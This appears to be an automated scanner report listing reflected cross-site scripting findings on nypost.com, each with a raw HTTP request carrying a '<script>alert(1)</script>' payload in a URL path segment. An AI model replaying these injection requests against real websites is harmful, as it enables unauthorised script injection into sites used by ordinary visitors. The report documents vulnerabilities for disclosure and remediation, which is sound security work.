GET /Resource/SysConfig/WebPortale4cf7<script>alert(1)</script>aab02ede959/nypost/blocks/ads/ads.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:02 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cfdca<script>alert(1)</script>d30004878bb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostcfdca<script>alert(1)</script>d30004878bb/blocks/ads/ads.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:08 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1fd42<script>alert(1)</script>67ffcdae71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks1fd42<script>alert(1)</script>67ffcdae71/ads/ads.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d8b49<script>alert(1)</script>24ae8c1056d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/adsd8b49<script>alert(1)</script>24ae8c1056d/ads.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1bdbd<script>alert(1)</script>b06ae33e8bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css1bdbd<script>alert(1)</script>b06ae33e8bd HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59948<script>alert(1)</script>50cd9c0218a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig59948<script>alert(1)</script>50cd9c0218a/WebPortal/nypost/blocks/block_links/block_links.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:24 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dff08<script>alert(1)</script>577eb990e51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9da4<script>alert(1)</script>551afe08244 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1d11b<script>alert(1)</script>5def719c2ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:30 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8933b<script>alert(1)</script>9d642fdaca7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:33 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b1b03<script>alert(1)</script>aa44ba2121a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5b4a<script>alert(1)</script>720f93d37d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 739 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f621<script>alert(1)</script>e9834c5b54d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 739 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:09 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c85fd<script>alert(1)</script>b5f9d728c50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 739 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73d80<script>alert(1)</script>f874c57cf69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 739 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4f36a<script>alert(1)</script>d8e3415c99f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 739 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:16 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d74f<script>alert(1)</script>4103bd751f4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 739 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:18 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88c89<script>alert(1)</script>690a4345437 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:55 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98f73<script>alert(1)</script>9a7b5d8e3b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce062<script>alert(1)</script>a6eac44dde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:02 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3920<script>alert(1)</script>d04ffc14596 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:04 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 26d00<script>alert(1)</script>aa71840f4bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 42583<script>alert(1)</script>da97e745c86 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:09 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9270c<script>alert(1)</script>7f4bc085917 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 747 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:27 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65cda<script>alert(1)</script>376ac24913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal65cda<script>alert(1)</script>376ac24913/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 746 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:32 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c55<script>alert(1)</script>c4d72438687 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nyposta8c55<script>alert(1)</script>c4d72438687/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 747 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:34 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload eb930<script>alert(1)</script>a951160820c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blockseb930<script>alert(1)</script>a951160820c/classifieds_verticals/classifieds_verticals.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 747 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:39 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9813d<script>alert(1)</script>624dd600ebd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals9813d<script>alert(1)</script>624dd600ebd/classifieds_verticals.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 747 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:41 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 11eb5<script>alert(1)</script>240343d24bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 747 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:42 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9004e<script>alert(1)</script>dc2a72fb414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
